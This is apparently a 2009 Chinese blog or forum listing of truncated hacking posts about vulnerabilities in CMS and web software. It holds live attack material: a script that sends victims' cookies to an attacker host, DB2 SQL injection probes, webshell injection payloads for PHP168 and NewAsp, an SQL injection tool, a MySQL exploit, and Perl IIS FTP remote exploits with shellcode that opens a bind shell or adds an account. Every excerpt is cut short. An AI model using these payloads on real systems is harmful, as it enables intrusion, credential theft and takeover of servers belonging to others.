2009-10-21 17:36
作者:博士
漏洞文件download.php
<?php
require dirname(__FILE__).'/include/common.inc.php';
$a_k = phpcms_auth($a_k, 'DECODE', AUTH_KEY); //注意!!
if(empty($a_k)) showmessage($LANG['illegal_parameters']);
parse_str($a_k);
|
2009-10-18 08:56
作者:st0p&Rainy'Fox
同样是在magic_quotes_gpc=off的情况下可用
漏洞版本:DEDECMS 5.1
此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl
|
2009-10-18 08:51
author: cnryan @http://hi.baidu.com/cnryan
cookie窃取是最常见的跨站攻击之一,不管是用img,iframe方式,还是基于入库型或非入库的XSS,整个操作只需要带Cookie浏览器请求了某个的url即可完成。
本人偏爱Image:
<script>
img = new Image(); img.src = "http://evilHost/get.asp?cookie=" document.cookie;img.width=0;img.height=0
</script>
盗cookie脚本:
还是一个比较简单的程序,经 |
2009-10-18 08:49
author: cnryan @http://hi.baidu.com/cnryan
网趣网上购物系统是一套简单易用、功能强大、用户使用最为广泛的网上购物开店平台,凭借多年的网上购物系统研发经验,软件功能日趋强大与完善、依托庞大的用户使用群体,网趣网上购物系统越来越受到用户的青睐,成为众多用户网上开店首选品牌。
这是官方的话 ↑
这个sql injection出现在找回密码处,最新版本的9.4也存在漏洞,随后对v9.0等以下版本测试均存在漏洞。
漏洞页面:getpwd2.asp
漏洞代码:
<%
u |
2009-10-11 12:41
受影响系统:
动网论坛 Dvbbs php 2.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 36282
DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序。
DvBBS没有正确地过滤用户提交给boardrule.php模块的groupboardid参数,远程攻击者可以通过向论坛提交恶意参数请求执行SQL注入攻击。
<*来源:Securitylab.ir
链接: |
2009-09-24 20:27
作者:浅凝
很多时候对于开放1521端口的Windows下Oracle数据库服务器,因为大多存在默认低权限用户dbsnmp,或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令,由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限,直至得到系统的SYSTEM权限。
而 对于Linux下的Oracle数据库入侵,因为Linux下一般Oracle数据库都是以Oracle的独立用户在跑,所以无法获取到root权限。当 然很多WEB和数据库在同一服务器上的时候,可以导出WEBSHELL到WEB目录来获取权限。然而大部分的数据库都是独立跑在一个服务器上,以下用 |
2009-09-24 20:26
转自:[朱总司令]
DB2数据库ASCII半折法注射方法
UNION方式暂没空研究,有空再折腾,项目里遇到DB2的数据库,网上没完整的资料,顺手整了这一份,第一条和第二条已在实际注射环境测试,其余各条在查询分析器中测试OK。
做人要厚道,转载请注明出处
猜用户表数量:
and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER)
猜表长度:
and 3<(SELECT LENGTH(NAME) FROM SYSIBM.SYSTABLES where name not in(’COLUMNS’) fetch first 1 rows only)
|
2009-09-24 20:09
首发:红科网安
作者:Amxking
概述:
由于新云4.0对注册用户未过滤特殊字符,造成黑客通过脚本编码转换将一句话木马写入数据库文件,从而获得WEBSHELL权限。
测试:
1. 打开www.google.cn 搜索关键字:Powered By NewAsp CMS Version 4.0 或 新云问吧
2. 将<%execute reques |
2009-09-24 20:07
作者:LCX
set arg=wscript.arguments
If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
Wscript.Quit
End If
if arg.count=0 then
usage()
Wscript.Quit
End If
Sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型"
wsh.echo "sqlids v0.02 by lcx"
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptname& |
2009-09-23 07:27
出自:http://t00ls.net
<?php
echo" +----------------------------------------------------------------+\r\n";
echo" [url]http://www.t00ls.net[/url]\r\n";
echo" +----------------------------------------------------------------+\r\n";
for ($ii=1;$ii<=99;$ii++)
{
$c=(int)$ii*10+1;
$a="web.search.naver.com";
$b="/search.nav |
2009-09-23 07:26
出自:http://t00ls.net
<?php
for ($ii=0;$ii<=300;$ii++)
{
$c=(int)$ii*10+1;
print $c." \r\n";
echo" +----------------------------------------------------------------+\r\n";
echo" [url]http://www.t00ls.net[/url] \r\n";
echo" +----------------------------------------------------------------+\r\n";
$a="web.se |
2009-09-15 19:45
MySQL_Exploit.c
Exp [-s socket]|[-h host][-p port]][-x]
****************************************************************
*/
#include <stdio.h>
#include <mysql.h>
#include <unistd.h>
int thd = 0x8b1b338;
int tbl = 0x8b3a880;
#define USOCK2 "/tmp/mysql.sock"
char addr_tdh[4];
char addr_tbl[4];
char addr_ret[4];
#define TBL_POS 182
#define THD_POS 178 |
2009-09-08 21:00
危险等级:高
影响版本:PHP168 6.0以下版本
入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。
测试语句:
?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);? |
2009-09-03 08:30
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
# http://www.offensive-security.com/0day/msftp.pl.txt
use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x |
2009-09-03 08:29
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x |
|
|
瘋吇ぺx
男, 101岁
吉林 长春
上次登录: 17天前
加为好友
|